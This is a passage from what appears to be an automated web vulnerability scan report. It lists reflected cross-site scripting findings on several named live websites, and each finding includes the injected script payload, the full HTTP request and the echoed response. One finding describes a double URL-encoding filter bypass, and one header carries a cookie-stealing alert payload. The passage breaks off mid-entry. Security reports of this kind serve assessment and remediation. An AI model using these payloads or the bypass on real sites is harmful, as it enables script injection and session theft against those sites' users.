GET /contact/live-trial-adwords?utm_source=Google&utm_medium=PPC51199"><script>alert(1)</script>56bf2d5010f&kw=erdas%20extensions%20for%20arcgis&utm_campaign=Competitors-Competitor_Companies/ HTTP/1.1
Host: www.espatial.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 05:06:42 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.9
X-Pingback: http://www.espatial.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 31515

<!DOCTYPE html>
<html dir="ltr" lang="en-US">
<head>
<meta charset="UTF-8" />
<title>Discover the power of GIS with web delivery | eSpatial GIS USA</title>
<meta name="google-site-verification"
...[SNIP]...
<input id="medium" maxlength="100" name="LEADCF16" type="text" value="PPC51199\"><script>alert(1)</script>56bf2d5010f&#8221; />
...[SNIP]...

4.1180. http://www.espatial.com/contact/live-trial-adwords [utm_source parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.espatial.com
Path:   /contact/live-trial-adwords

Issue detail

The value of the utm_source request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 343dc"><script>alert(1)</script>8d97a1fb067 was submitted in the utm_source parameter. This input was echoed as 343dc\"><script>alert(1)</script>8d97a1fb067 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /contact/live-trial-adwords?utm_source=Google343dc"><script>alert(1)</script>8d97a1fb067&utm_medium=PPC&kw=erdas%20extensions%20for%20arcgis&utm_campaign=Competitors-Competitor_Companies/ HTTP/1.1
Host: www.espatial.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 05:06:17 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.9
X-Pingback: http://www.espatial.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 31515

<!DOCTYPE html>
<html dir="ltr" lang="en-US">
<head>
<meta charset="UTF-8" />
<title>Discover the power of GIS with web delivery | eSpatial GIS USA</title>
<meta name="google-site-verification"
...[SNIP]...
<input id="source" name="LEADCF19" type="text" value="Google343dc\"><script>alert(1)</script>8d97a1fb067&#8243; />
...[SNIP]...

4.1181. http://www.flashedition.com/flippingGen.php [lim parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.flashedition.com
Path:   /flippingGen.php

Issue detail

The value of the lim request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d300a"%3balert(1)//466e3d06500 was submitted in the lim parameter. This input was echoed as d300a";alert(1)//466e3d06500 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /flippingGen.php?i=53162&m=12191&ttype=curlstatic&popup=true&h=148&lim=d300a"%3balert(1)//466e3d06500&remToolbars=true&roll= HTTP/1.1
Host: www.flashedition.com
Proxy-Connection: keep-alive
Referer: http://www.parenthood.com/?d1907'-alert(document.cookie)-'807a8eb3eff=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx/0.7.63
Date: Tue, 25 Jan 2011 02:46:47 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
X-Powered-By: PHP/5.3.5
Vary: Accept-Encoding
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Content-Length: 1540

<html>
<head>
<script type="text/javascript" src="http://www.flashedition.com/javascript/AC_RunActiveContent.js"></script>
<script type="text/javascript">
function pop(dest) {
window.open(dest,'Ar
...[SNIP]...
<script type="text/javascript">
var flashvars = "|type=curl|lim=d300a";alert(1)//466e3d06500|roll=Click Here|remToolbars=true|0";
AC_FL_RunContent( 'codebase','http://fpdownload.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=8,0,0,0','width','104','height','135','align','middle',
...[SNIP]...

4.1182. http://www.flashedition.com/flippingGen.php [m parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.flashedition.com
Path:   /flippingGen.php

Issue detail

The value of the m request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d2891"><script>alert(1)</script>9f569d106b3 was submitted in the m parameter. This input was echoed as d2891\"><script>alert(1)</script>9f569d106b3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /flippingGen.php?i=53162&m=12191d2891"><script>alert(1)</script>9f569d106b3&ttype=curlstatic&popup=true&h=148&lim=&remToolbars=true&roll= HTTP/1.1
Host: www.flashedition.com
Proxy-Connection: keep-alive
Referer: http://www.parenthood.com/?d1907'-alert(document.cookie)-'807a8eb3eff=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx/0.7.63
Date: Tue, 25 Jan 2011 02:46:02 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
X-Powered-By: PHP/5.3.5
Vary: Accept-Encoding
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Content-Length: 1556

<html>
<head>
<script type="text/javascript" src="http://www.flashedition.com/javascript/AC_RunActiveContent.js"></script>
<script type="text/javascript">
function pop(dest) {
window.open(dest,'Ar
...[SNIP]...
<a href="http://www.flashedition.com/publication?m=12191d2891\"><script>alert(1)</script>9f569d106b3&l=1">
...[SNIP]...

4.1183. http://www.flashedition.com/flippingGen.php [remToolbars parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.flashedition.com
Path:   /flippingGen.php

Issue detail

The value of the remToolbars request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6d68a"%3balert(1)//12a5c5f7f74 was submitted in the remToolbars parameter. This input was echoed as 6d68a";alert(1)//12a5c5f7f74 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /flippingGen.php?i=53162&m=12191&ttype=curlstatic&popup=true&h=148&lim=&remToolbars=true6d68a"%3balert(1)//12a5c5f7f74&roll= HTTP/1.1
Host: www.flashedition.com
Proxy-Connection: keep-alive
Referer: http://www.parenthood.com/?d1907'-alert(document.cookie)-'807a8eb3eff=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx/0.7.63
Date: Tue, 25 Jan 2011 02:46:58 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
X-Powered-By: PHP/5.3.5
Vary: Accept-Encoding
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Content-Length: 1540

<html>
<head>
<script type="text/javascript" src="http://www.flashedition.com/javascript/AC_RunActiveContent.js"></script>
<script type="text/javascript">
function pop(dest) {
window.open(dest,'Ar
...[SNIP]...
<script type="text/javascript">
var flashvars = "|type=curl|lim=|roll=Click Here|remToolbars=true6d68a";alert(1)//12a5c5f7f74|0";
AC_FL_RunContent( 'codebase','http://fpdownload.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=8,0,0,0','width','104','height','135','align','middle','allowScriptAccess','always','src
...[SNIP]...

4.1184. http://www.flashedition.com/flippingGen.php [roll parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.flashedition.com
Path:   /flippingGen.php

Issue detail

The value of the roll request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ec7c6"%3balert(1)//123eb991fc6 was submitted in the roll parameter. This input was echoed as ec7c6";alert(1)//123eb991fc6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /flippingGen.php?i=53162&m=12191&ttype=curlstatic&popup=true&h=148&lim=&remToolbars=true&roll=ec7c6"%3balert(1)//123eb991fc6 HTTP/1.1
Host: www.flashedition.com
Proxy-Connection: keep-alive
Referer: http://www.parenthood.com/?d1907'-alert(document.cookie)-'807a8eb3eff=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx/0.7.63
Date: Tue, 25 Jan 2011 02:47:09 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
X-Powered-By: PHP/5.3.5
Vary: Accept-Encoding
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Content-Length: 1530

<html>
<head>
<script type="text/javascript" src="http://www.flashedition.com/javascript/AC_RunActiveContent.js"></script>
<script type="text/javascript">
function pop(dest) {
window.open(dest,'Ar
...[SNIP]...
<script type="text/javascript">
var flashvars = "|type=curl|lim=|roll=ec7c6";alert(1)//123eb991fc6|remToolbars=true|0";
AC_FL_RunContent( 'codebase','http://fpdownload.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=8,0,0,0','width','104','height','135','align','middle','allowScriptAcce
...[SNIP]...

4.1185. http://www.flashedition.com/publication [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.flashedition.com
Path:   /publication

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fc6ee"-alert(1)-"5a80650f1f2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /publication?i=53162&fc6ee"-alert(1)-"5a80650f1f2=1 HTTP/1.1
Host: www.flashedition.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Server: nginx/0.7.63
Date: Tue, 25 Jan 2011 13:15:17 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Vary: Accept-Encoding
X-Powered-By: PHP/5.3.5
P3P: policyref="/w3c/p3p.xml",CP="CAO DSP COR CURa ADMa DEVa TAIa PSAo PSDo CONo TELo OUR DELo SAMo OTRo BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Set-Cookie: PHPSESSID=l2euff51eop9u11c04vqou2vi2; expires=Tue, 25-Jan-2011 17:15:17 GMT; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: u_id=l2euff51eop9u11c04vqou2vi2; expires=Wed, 25-Jan-2012 13:15:17 GMT
Set-Cookie: ie_warn=1; expires=Wed, 25-Jan-2012 13:15:17 GMT
Vary: Accept-Encoding
Content-Length: 6822
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=u
...[SNIP]...
ude: lat_lng,
cloud: "",
Referrer: "",
VersionNo: "viewer-184",
Client_TZ_Offset: currentTime.getTimezoneOffset(),
Browser_Plugins: plugins,
Request_URI: "/publication/?i=53162&fc6ee"-alert(1)-"5a80650f1f2=1",
toolbar_type: "1",
Analytics_URL: "http://collector.thermstats.com/", domain: "http://www.flashedition.com",
page: "1",
analytics: "1",
preLoaderSource: "/publicatio
...[SNIP]...

4.1186. http://www.google.com/advanced_search [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.google.com
Path:   /advanced_search

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload e8b16(a)ffc7188f57 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject JavaScript commands into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /advanced_search?e8b16(a)ffc7188f57=1 HTTP/1.1
Host: www.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=173272373.1294766927.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=173272373.1871872.1294766927.1294766927.1294766927.1; PREF=ID=11a9f75446a95c33:U=f6f0157cbdaf97f8:FF=0:TM=1293845297:LM=1295377703:GM=1:S=8wu8JKm_kVjmCdUt; NID=42=TKkfn6Tg7OKIy4aZoe4v6m5-9eWtGaicWAxOp0ReoP7haXOs4wVSbY3dIWgiz04r_L-gfyIMSiYfCfw16ffNlM8YVHvy9fcgoDr9uWOPODsh-QzrVXD7T9MKFCea-X0V;

Response

HTTP/1.1 200 OK
Cache-Control: private, max-age=0
Date: Mon, 24 Jan 2011 16:39:54 GMT
Expires: -1
Content-Type: text/html; charset=UTF-8
Server: gws
X-XSS-Protection: 1; mode=block
Connection: close

<html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>Google Advanced Search</title><style id=gstyle>html{overflow-y:scroll}div,td,.n a,.n a:visited{color:#000}.ts td,.
...[SNIP]...
t()});
})();
;}catch(e){google.ml(e,false,{'cause':'defer'});}if(google.med) {google.med('init');google.initHistory();google.med('history');}google.History&&google.History.initialize('/advanced_search?e8b16(a)ffc7188f57\x3d1')});if(google.j&&google.j.en&&google.j.xi){window.setTimeout(google.j.xi,0);}</script>
...[SNIP]...

4.1187. http://www.iloubnan.info/artsandculture/actualite/id/47982/theme/111/titre/Raquel-Boldorini-in-concert-at-AUB-s-Assembly-Hall/x22 [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.iloubnan.info
Path:   /artsandculture/actualite/id/47982/theme/111/titre/Raquel-Boldorini-in-concert-at-AUB-s-Assembly-Hall/x22

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 96d40"><img%20src%3da%20onerror%3dalert(1)>8a98a4ad0ce was submitted in the REST URL parameter 6. This input was echoed as 96d40"><img src=a onerror=alert(1)>8a98a4ad0ce in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /artsandculture/actualite/id/47982/theme/11196d40"><img%20src%3da%20onerror%3dalert(1)>8a98a4ad0ce/titre/Raquel-Boldorini-in-concert-at-AUB-s-Assembly-Hall/x22 HTTP/1.1
Host: www.iloubnan.info
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 406 Not Acceptable
Date: Mon, 24 Jan 2011 16:46:08 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: PHPSESSID=7c35695191a00bdfc899004adec3777e; path=/
Connection: close
Content-Type: text/html
Content-Length: 29989


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml"

xmlns:og="http://opengraph
...[SNIP]...
<a href="/artsandculture/actualites/theme/11196d40"><img src=a onerror=alert(1)>8a98a4ad0ce">
...[SNIP]...

4.1188. http://www.joomlacorner.com/joomla-news/608-joomla-16-has-arrived.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.joomlacorner.com
Path:   /joomla-news/608-joomla-16-has-arrived.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 86f61"><a>94b097f275a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /joomla-news/608-joomla-16-has-arrived.html?86f61"><a>94b097f275a=1 HTTP/1.1
Host: www.joomlacorner.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:17:54 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.16
Set-Cookie: 992260232bef5a730b1bd291176df96d=939f6a9032f82658be7e27481228eac4; path=/
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: ja_anion_tpl=ja_anion; expires=Sat, 14-Jan-2012 15:17:55 GMT; path=/
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Mon, 24 Jan 2011 15:17:56 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 32165

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="th-th" lang="th-th">

...[SNIP]...
<iframe src="http://www.facebook.com/plugins/like.php?href=http://www.joomlacorner.com/joomla-news/608-joomla-16-has-arrived.html?86f61"><a>94b097f275a=1&amp;layout=button_count&amp;show_faces=true&amp;action=like&amp;colorscheme=light&amp;width=90&amp;height=20" scrolling="no" frameborder="0" style="border:none; overflow:hidden;" allowTransparency="
...[SNIP]...

4.1189. http://www.joomlacorner.com/joomla-news/608-joomla-16-has-arrived.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.joomlacorner.com
Path:   /joomla-news/608-joomla-16-has-arrived.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is not encapsulated in any quotation marks. The payload 8e400><a>e79886acd90 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /joomla-news/608-joomla-16-has-arrived.html?8e400><a>e79886acd90=1 HTTP/1.1
Host: www.joomlacorner.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:16:55 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.16
Set-Cookie: 992260232bef5a730b1bd291176df96d=5009afaf1ce89542e374ff7187e38db3; path=/
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: ja_anion_tpl=ja_anion; expires=Sat, 14-Jan-2012 15:16:55 GMT; path=/
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Mon, 24 Jan 2011 15:16:57 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 32149

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="th-th" lang="th-th">

...[SNIP]...
<a title="Joomla!.. 1.6 ..................!" class="google-buzz-button" href="http://www.google.com/buzz/post" data-url=http://www.joomlacorner.com/joomla-news/608-joomla-16-has-arrived.html?8e400><a>e79886acd90=1 data-button-style="small-count">
...[SNIP]...

4.1190. http://www.linkagogo.com/go/AddNoPopup [title parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.linkagogo.com
Path:   /go/AddNoPopup

Issue detail

The value of the title request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 913f2"><script>alert(1)</script>ce47769743c was submitted in the title parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /go/AddNoPopup?url={u}&title={t}913f2"><script>alert(1)</script>ce47769743c HTTP/1.1
Host: www.linkagogo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:42:33 GMT
Server: Apache/2.2.8 (Unix) mod_ssl/2.2.8 OpenSSL/0.9.8b Resin/3.1.4
ETag: "AAAAS27evaQ"
Last-Modified: Tue, 25 Jan 2011 04:42:34 GMT
Cache-Control: no-cache
Expires: 0
Set-Cookie: user=-1; path=/; expires=Mon, 16-Jan-2012 04:42:33 GMT
Set-Cookie: userName=guest; path=/; expires=Mon, 16-Jan-2012 04:42:33 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Content-Length: 16442

<html lang="eng-US">
<head>
<link rel="search" type="application/opensearchdescription+xml" href="/addons/linkagogo_search.xml" title="linkaGoGo favorites search" />
<link rel="search" type="applicati
...[SNIP]...
<input type="text" name="title" value="{t}913f2"><script>alert(1)</script>ce47769743c" size="50" maxlength="128">
...[SNIP]...

4.1191. http://www.linkagogo.com/go/AddNoPopup [title parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.linkagogo.com
Path:   /go/AddNoPopup

Issue detail

The value of the title request parameter is copied into the HTML document as plain text between tags. The payload b7049<script>alert(1)</script>1c38d89fec7 was submitted in the title parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /go/AddNoPopup?url={u}&title={t}b7049<script>alert(1)</script>1c38d89fec7 HTTP/1.1
Host: www.linkagogo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:42:39 GMT
Server: Apache/2.2.8 (Unix) mod_ssl/2.2.8 OpenSSL/0.9.8b Resin/3.1.4
ETag: "AAAAS27ew4A"
Last-Modified: Tue, 25 Jan 2011 04:42:40 GMT
Cache-Control: no-cache
Expires: 0
Set-Cookie: cookies=Y; path=/
Set-Cookie: user=-1; path=/; expires=Mon, 16-Jan-2012 04:42:38 GMT
Set-Cookie: userName=guest; path=/; expires=Mon, 16-Jan-2012 04:42:38 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Content-Length: 16436

<html lang="eng-US">
<head>
<link rel="search" type="application/opensearchdescription+xml" href="/addons/linkagogo_search.xml" title="linkaGoGo favorites search" />
<link rel="search" type="applicati
...[SNIP]...
<textarea name="comments" rows=4 cols=50 wrap>{t}b7049<script>alert(1)</script>1c38d89fec7</textarea>
...[SNIP]...

4.1192. http://www.linkagogo.com/go/AddNoPopup [url parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.linkagogo.com
Path:   /go/AddNoPopup

Issue detail

The value of the url request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6dcf1"><script>alert(1)</script>249de33cf45 was submitted in the url parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /go/AddNoPopup?url={u}6dcf1"><script>alert(1)</script>249de33cf45&title={t} HTTP/1.1
Host: www.linkagogo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:42:09 GMT
Server: Apache/2.2.8 (Unix) mod_ssl/2.2.8 OpenSSL/0.9.8b Resin/3.1.4
ETag: "AAAAS27epjQ"
Last-Modified: Tue, 25 Jan 2011 04:42:10 GMT
Cache-Control: no-cache
Expires: 0
Content-Length: 16356
Set-Cookie: cookies=Y; path=/
Set-Cookie: user=-1; path=/; expires=Mon, 16-Jan-2012 04:42:09 GMT
Set-Cookie: userName=guest; path=/; expires=Mon, 16-Jan-2012 04:42:09 GMT
Content-Type: text/html; charset=utf-8
Connection: close

<html lang="eng-US">
<head>
<link rel="search" type="application/opensearchdescription+xml" href="/addons/linkagogo_search.xml" title="linkaGoGo favorites search" />
<link rel="search" type="applicati
...[SNIP]...
<input type="text" name="url" value="{u}6dcf1"><script>alert(1)</script>249de33cf45" size="50" maxlength="2048" >
...[SNIP]...

4.1193. http://www.lithuanianjoomla.com/7-joomla-naujienos/70-joomla-160-isleista.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.lithuanianjoomla.com
Path:   /7-joomla-naujienos/70-joomla-160-isleista.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c1471%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e4fb583d3360 was submitted in the REST URL parameter 1. This input was echoed as c1471"><script>alert(1)</script>4fb583d3360 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /7-joomla-naujienosc1471%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e4fb583d3360/70-joomla-160-isleista.html HTTP/1.1
Host: www.lithuanianjoomla.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:16:36 GMT
Server: Apache
Set-Cookie: 2d3002958ebe475c6a8e5c841c44742a=173c304feeb1dfb81f054f2597ddca74; path=/
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Cache-Control: no-cache
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 16655


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="lt-lt" lang="lt-lt" dir=
...[SNIP]...
<base href="http://www.lithuanianjoomla.com/7-joomla-naujienosc1471"><script>alert(1)</script>4fb583d3360/70-joomla-160-isleista.html" />
...[SNIP]...

4.1194. http://www.lithuanianjoomla.com/7-joomla-naujienos/70-joomla-160-isleista.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.lithuanianjoomla.com
Path:   /7-joomla-naujienos/70-joomla-160-isleista.html

Issue detail

